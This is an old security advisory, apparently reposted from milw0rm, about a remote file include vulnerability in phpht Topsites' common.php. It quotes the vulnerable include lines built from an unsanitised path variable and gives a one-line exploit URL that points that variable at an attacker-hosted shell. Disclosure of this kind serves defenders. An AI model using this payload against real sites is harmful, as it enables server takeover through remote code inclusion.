Security Advisory: phpht Topsites (common.php) Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  CMS contenido Remote File Inclusion
  miniBB keyword_replacer <= 1.0 [pathToFiles] Remote File Include Vulnerability
  AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
  phpBB Ajax Shoutbox <= 0.0.5 Remote File Include Vulnerability

From: MILW0RM <submit_(at)_milw0rm.com>
Date: 13.10.2006
Subject: phpht Topsites (common.php) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

phpht Topsites (phpht_real_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Author: xoron

www.xoron.biz - www.xoron.info

Ne mutlu Türküm Diyene..!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

URL:
http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Ar
chivos)/PHPht%20Topsites.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

CODE:

include($phpht_real_path . 'config.'.$phpEx);
include($phpht_real_path . 'includes/db.'.$phpEx);
include($phpht_real_path . 'includes/Template.'.$phpEx);
include($phpht_real_path . 'language/lang_english/lang_main.'.$phpEx);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/common.php?phpht_real_path=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Thanx: chaos, nukedx, OG, Preddy, Ironfist, SHiKaA, ERNE :)
Special: Str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

# milw0rm.com [2006-10-12]